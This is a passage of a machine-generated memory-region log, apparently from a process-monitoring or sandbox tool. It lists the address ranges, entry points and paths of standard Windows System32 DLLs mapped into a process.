end_va = 0x7ffc4dffffff
monitored = 0
entry_point = 0x7ffc4dfd6c60
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1290
start_va = 0x7ffc4e070000
end_va = 0x7ffc4e08efff
monitored = 0
entry_point = 0x7ffc4e0737e0
region_type = mapped_file
name = "netsetupapi.dll"
filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll")
Region:
id = 1291
start_va = 0x7ffc4e090000
end_va = 0x7ffc4e108fff
monitored = 0
entry_point = 0x7ffc4e0976a0
region_type = mapped_file
name = "netsetupshim.dll"
filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll")
Region:
id = 1292
start_va = 0x7ffc4e2f0000
end_va = 0x7ffc4e305fff
monitored = 0
entry_point = 0x7ffc4e2f1d50
region_type = mapped_file
name = "wwapi.dll"
filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")
Region:
id = 1293
start_va = 0x7ffc4e310000
end_va = 0x7ffc4e327fff
monitored = 0
entry_point = 0x7ffc4e314e10
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Region:
id = 1294
start_va = 0x7ffc4e330000
end_va = 0x7ffc4e354fff
monitored = 0
entry_point = 0x7ffc4e335ca0
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 1295
start_va = 0x7ffc4e3c0000
end_va = 0x7ffc4e400fff
monitored = 0
entry_point = 0x7ffc4e3c3750
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1296
start_va = 0x7ffc4e410000
end_va = 0x7ffc4e502fff
monitored = 0
entry_point = 0x7ffc4e435d80
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1297
start_va = 0x7ffc4e510000
end_va = 0x7ffc4e527fff
monitored = 0
entry_point = 0x7ffc4e512000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1298
start_va = 0x7ffc4e530000
end_va = 0x7ffc4e6b1fff
monitored = 0
entry_point = 0x7ffc4e5482a0
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1299
start_va = 0x7ffc4eca0000
end_va = 0x7ffc4ed42fff
monitored = 0
entry_point = 0x7ffc4eca2c10
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1300
start_va = 0x7ffc4ed50000
end_va = 0x7ffc4eda1fff
monitored = 0
entry_point = 0x7ffc4ed55770
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1301
start_va = 0x7ffc4edb0000
end_va = 0x7ffc4edddfff
monitored = 1
entry_point = 0x7ffc4edb2300
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 1302
start_va = 0x7ffc4ede0000
end_va = 0x7ffc4ee3dfff
monitored = 0
entry_point = 0x7ffc4ede5080
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 1303
start_va = 0x7ffc4ee40000
end_va = 0x7ffc4ee5ffff
monitored = 0
entry_point = 0x7ffc4ee41f50
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 1304
start_va = 0x7ffc4ee60000
end_va = 0x7ffc4ee68fff
monitored = 0
entry_point = 0x7ffc4ee618f0
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 1305
start_va = 0x7ffc4ee70000
end_va = 0x7ffc4ee80fff
monitored = 0
entry_point = 0x7ffc4ee71d30
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1306
start_va = 0x7ffc4ee90000
end_va = 0x7ffc4ef0efff
monitored = 0
entry_point = 0x7ffc4eea7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1307
start_va = 0x7ffc4ef10000
end_va = 0x7ffc4ef4bfff
monitored = 0
entry_point = 0x7ffc4ef16aa0
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1308
start_va = 0x7ffc4f0d0000
end_va = 0x7ffc4f11bfff
monitored = 0
entry_point = 0x7ffc4f0e5310
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1309
start_va = 0x7ffc4f220000
end_va = 0x7ffc4f22bfff
monitored = 0
entry_point = 0x7ffc4f2235c0
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1310
start_va = 0x7ffc505f0000
end_va = 0x7ffc505f8fff
monitored = 0
entry_point = 0x7ffc505f21d0
region_type = mapped_file
name = "httpprxc.dll"
filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll")
Region:
id = 1311
start_va = 0x7ffc50660000
end_va = 0x7ffc50694fff
monitored = 0
entry_point = 0x7ffc5066a270
region_type = mapped_file
name = "fwpolicyiomgr.dll"
filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll")
Region:
id = 1312
start_va = 0x7ffc51300000
end_va = 0x7ffc51309fff
monitored = 0
entry_point = 0x7ffc51301350
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1313
start_va = 0x7ffc516a0000
end_va = 0x7ffc516b1fff
monitored = 0
entry_point = 0x7ffc516a3580
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 1314
start_va = 0x7ffc538e0000
end_va = 0x7ffc538e9fff
monitored = 0
entry_point = 0x7ffc538e14c0
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1315
start_va = 0x7ffc53d70000
end_va = 0x7ffc53d7ffff
monitored = 0
entry_point = 0x7ffc53d71700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 1316
start_va = 0x7ffc53d80000
end_va = 0x7ffc53d88fff
monitored = 0
entry_point = 0x7ffc53d81ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 1317
start_va = 0x7ffc53d90000
end_va = 0x7ffc53dbcfff
monitored = 0
entry_point = 0x7ffc53d92290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 1318
start_va = 0x7ffc53dc0000
end_va = 0x7ffc53e11fff
monitored = 0
entry_point = 0x7ffc53dc38e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 1319
start_va = 0x7ffc54080000
end_va = 0x7ffc540fffff
monitored = 0
entry_point = 0x7ffc540ad280
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 1320
start_va = 0x7ffc54160000
end_va = 0x7ffc54174fff
monitored = 0
entry_point = 0x7ffc54162dc0
region_type = mapped_file
name = "ondemandconnroutehelper.dll"
filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll")
Region:
id = 1321
start_va = 0x7ffc541c0000
end_va = 0x7ffc541cdfff
monitored = 0
entry_point = 0x7ffc541c1460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1322
start_va = 0x7ffc541d0000
end_va = 0x7ffc541eafff
monitored = 0
entry_point = 0x7ffc541d1040
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 1323
start_va = 0x7ffc54510000
end_va = 0x7ffc545a9fff
monitored = 0
entry_point = 0x7ffc5452ada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1324
start_va = 0x7ffc545e0000
end_va = 0x7ffc545f7fff
monitored = 0
entry_point = 0x7ffc545eb850
region_type = mapped_file
name = "dmcmnutils.dll"
filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll")
Region:
id = 1325
start_va = 0x7ffc54680000
end_va = 0x7ffc546e6fff
monitored = 0
entry_point = 0x7ffc546863e0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1326
start_va = 0x7ffc54740000
end_va = 0x7ffc54754fff
monitored = 0
entry_point = 0x7ffc54743460
region_type = mapped_file
name = "ssdpapi.dll"
filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll")
Region:
id = 1327
start_va = 0x7ffc54830000
end_va = 0x7ffc548effff
monitored = 0
entry_point = 0x7ffc5485fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1328
start_va = 0x7ffc54b20000
end_va = 0x7ffc54b39fff
monitored = 0
entry_point = 0x7ffc54b22430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1329
start_va = 0x7ffc54b40000
end_va = 0x7ffc54b53fff
monitored = 0
entry_point = 0x7ffc54b42d50
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1330
start_va = 0x7ffc54ed0000
end_va = 0x7ffc54f62fff
monitored = 0
entry_point = 0x7ffc54ed9680
region_type = mapped_file
name = "msvcp_win.dll"
filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll")
Region:
id = 1331
start_va = 0x7ffc54f70000
end_va = 0x7ffc54f7afff
monitored = 0
entry_point = 0x7ffc54f71de0
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1332
start_va = 0x7ffc55190000
end_va = 0x7ffc551a5fff
monitored = 0
entry_point = 0x7ffc551919f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1333
start_va = 0x7ffc55360000
end_va = 0x7ffc55378fff
monitored = 0
entry_point = 0x7ffc55364520
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1334
start_va = 0x7ffc55820000
end_va = 0x7ffc55857fff
monitored = 0
entry_point = 0x7ffc55838cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1335
start_va = 0x7ffc55860000
end_va = 0x7ffc5586afff
monitored = 0
entry_point = 0x7ffc55861d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1336
start_va = 0x7ffc55c60000
end_va = 0x7ffc55fe1fff
monitored = 0
entry_point = 0x7ffc55cb1220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1337
start_va = 0x7ffc570e0000
end_va = 0x7ffc571edfff
monitored = 0
entry_point = 0x7ffc5712eaa0
region_type = mapped_file
name = "mrmcorer.dll"
filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll")
Region:
id = 1338
start_va = 0x7ffc574f0000
end_va = 0x7ffc57506fff
monitored = 0
entry_point = 0x7ffc574f5630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1339
start_va = 0x7ffc57570000
end_va = 0x7ffc57582fff
monitored = 0
entry_point = 0x7ffc575757f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1340
start_va = 0x7ffc57590000
end_va = 0x7ffc57609fff
monitored = 0
entry_point = 0x7ffc575b7630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1341
start_va = 0x7ffc57620000
end_va = 0x7ffc5764dfff
monitored = 0
entry_point = 0x7ffc57627550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1342
start_va = 0x7ffc57650000
end_va = 0x7ffc57665fff
monitored = 0
entry_point = 0x7ffc57651b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1343
start_va = 0x7ffc57670000
end_va = 0x7ffc576d3fff
monitored = 0
entry_point = 0x7ffc57685ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1344
start_va = 0x7ffc578a0000
end_va = 0x7ffc5794dfff
monitored = 0
entry_point = 0x7ffc578b80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1345
start_va = 0x7ffc57950000
end_va = 0x7ffc57961fff
monitored = 0
entry_point = 0x7ffc57959260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1346
start_va = 0x7ffc57970000
end_va = 0x7ffc57a20fff
monitored = 0
entry_point = 0x7ffc579e88b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1347
start_va = 0x7ffc57a30000
end_va = 0x7ffc57a54fff
monitored = 0
entry_point = 0x7ffc57a42f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1348
start_va = 0x7ffc57a60000
end_va = 0x7ffc57a70fff
monitored = 0
entry_point = 0x7ffc57a67ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1349
start_va = 0x7ffc57a80000
end_va = 0x7ffc57a99fff
monitored = 0
entry_point = 0x7ffc57a82cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1350
start_va = 0x7ffc57aa0000
end_va = 0x7ffc57af4fff
monitored = 0
entry_point = 0x7ffc57aa3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1351
start_va = 0x7ffc57b00000
end_va = 0x7ffc57b36fff
monitored = 0
entry_point = 0x7ffc57b06020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1352
start_va = 0x7ffc57b40000
end_va = 0x7ffc57b5ffff
monitored = 0
entry_point = 0x7ffc57b439a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1353
start_va = 0x7ffc57b60000
end_va = 0x7ffc57ba0fff
monitored = 0
entry_point = 0x7ffc57b64840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1354
start_va = 0x7ffc57bb0000
end_va = 0x7ffc57ce5fff
monitored = 0
entry_point = 0x7ffc57bdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1355
start_va = 0x7ffc57cf0000
end_va = 0x7ffc57dd5fff
monitored = 0
entry_point = 0x7ffc57d0cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1356
start_va = 0x7ffc57de0000
end_va = 0x7ffc57debfff
monitored = 0
entry_point = 0x7ffc57de14d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1357
start_va = 0x7ffc57df0000
end_va = 0x7ffc57dfbfff
monitored = 0
entry_point = 0x7ffc57df2830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 1358
start_va = 0x7ffc57e00000
end_va = 0x7ffc57e3dfff
monitored = 0
entry_point = 0x7ffc57e0a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1359
start_va = 0x7ffc57e40000
end_va = 0x7ffc57e66fff
monitored = 0
entry_point = 0x7ffc57e43bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1360
start_va = 0x7ffc57e70000
end_va = 0x7ffc57f37fff
monitored = 0
entry_point = 0x7ffc57eb13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1361
start_va = 0x7ffc57f40000
end_va = 0x7ffc57fa0fff
monitored = 0
entry_point = 0x7ffc57f44b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1362
start_va = 0x7ffc57fb0000
end_va = 0x7ffc5812bfff
monitored = 0
entry_point = 0x7ffc58001650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1363
start_va = 0x7ffc58130000
end_va = 0x7ffc5813afff
monitored = 0
entry_point = 0x7ffc58131770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1364
start_va = 0x7ffc58140000
end_va = 0x7ffc58194fff
monitored = 0
entry_point = 0x7ffc5814fc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1365
start_va = 0x7ffc58230000
end_va = 0x7ffc582c1fff
monitored = 0
entry_point = 0x7ffc5827a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1366
start_va = 0x7ffc58350000
end_va = 0x7ffc5835cfff
monitored = 0
entry_point = 0x7ffc58352ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1367
start_va = 0x7ffc58b50000
end_va = 0x7ffc58b7efff
monitored = 0
entry_point = 0x7ffc58b58910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1368
start_va = 0x7ffc58b80000
end_va = 0x7ffc58b8ffff
monitored = 0
entry_point = 0x7ffc58b82c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1369
start_va = 0x7ffc58c20000
end_va = 0x7ffc58c55fff
monitored = 0
entry_point = 0x7ffc58c30070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1370
start_va = 0x7ffc58cb0000
end_va = 0x7ffc58ccefff
monitored = 0
entry_point = 0x7ffc58cb4960
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1371
start_va = 0x7ffc58cd0000
end_va = 0x7ffc58d3dfff
monitored = 0
entry_point = 0x7ffc58cd7f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1372
start_va = 0x7ffc58d40000
end_va = 0x7ffc58d50fff
monitored = 0
entry_point = 0x7ffc58d43320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1373
start_va = 0x7ffc58d60000
end_va = 0x7ffc58da0fff
monitored = 0
entry_point = 0x7ffc58d77eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1374
start_va = 0x7ffc58db0000
end_va = 0x7ffc58eabfff
monitored = 0
entry_point = 0x7ffc58de6df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1375
start_va = 0x7ffc58eb0000
end_va = 0x7ffc58f6efff
monitored = 0
entry_point = 0x7ffc58ed1c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1376
start_va = 0x7ffc58fc0000
end_va = 0x7ffc58fc9fff
monitored = 0
entry_point = 0x7ffc58fc1660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1377
start_va = 0x7ffc58fd0000
end_va = 0x7ffc58fe7fff
monitored = 0
entry_point = 0x7ffc58fd5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1378
start_va = 0x7ffc58ff0000
end_va = 0x7ffc5913cfff
monitored = 0
entry_point = 0x7ffc59033da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1379
start_va = 0x7ffc59500000
end_va = 0x7ffc59992fff
monitored = 0
entry_point = 0x7ffc5950f760
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1380
start_va = 0x7ffc599a0000
end_va = 0x7ffc59a06fff
monitored = 0
entry_point = 0x7ffc599be710
region_type = mapped_file
name = "bcp47langs.dll"
filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll")
Region:
id = 1381
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1382
start_va = 0x7ffc5a2e0000
end_va = 0x7ffc5a358fff
monitored = 0
entry_point = 0x7ffc5a2ffb90
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 1383
start_va = 0x7ffc5a360000
end_va = 0x7ffc5a367fff
monitored = 0
entry_point = 0x7ffc5a3613e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1384
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1385
start_va = 0x7ffc5a530000
end_va = 0x7ffc5a54bfff
monitored = 0
entry_point = 0x7ffc5a5337a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1386
start_va = 0x7ffc5a6e0000
end_va = 0x7ffc5a71ffff
monitored = 0
entry_point = 0x7ffc5a6f1960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1387
start_va = 0x7ffc5a850000
end_va = 0x7ffc5a876fff
monitored = 0
entry_point = 0x7ffc5a857940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1388
start_va = 0x7ffc5a8a0000
end_va = 0x7ffc5a949fff
monitored = 0
entry_point = 0x7ffc5a8c7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1389
start_va = 0x7ffc5aae0000
end_va = 0x7ffc5aaebfff
monitored = 0
entry_point = 0x7ffc5aae2480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1390
start_va = 0x7ffc5abb0000
end_va = 0x7ffc5abe1fff
monitored = 0
entry_point = 0x7ffc5abc2340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1391
start_va = 0x7ffc5ae20000
end_va = 0x7ffc5ae2bfff
monitored = 0
entry_point = 0x7ffc5ae22790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1392
start_va = 0x7ffc5ae30000
end_va = 0x7ffc5ae53fff
monitored = 0
entry_point = 0x7ffc5ae33260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1393
start_va = 0x7ffc5afd0000
end_va = 0x7ffc5b0c3fff
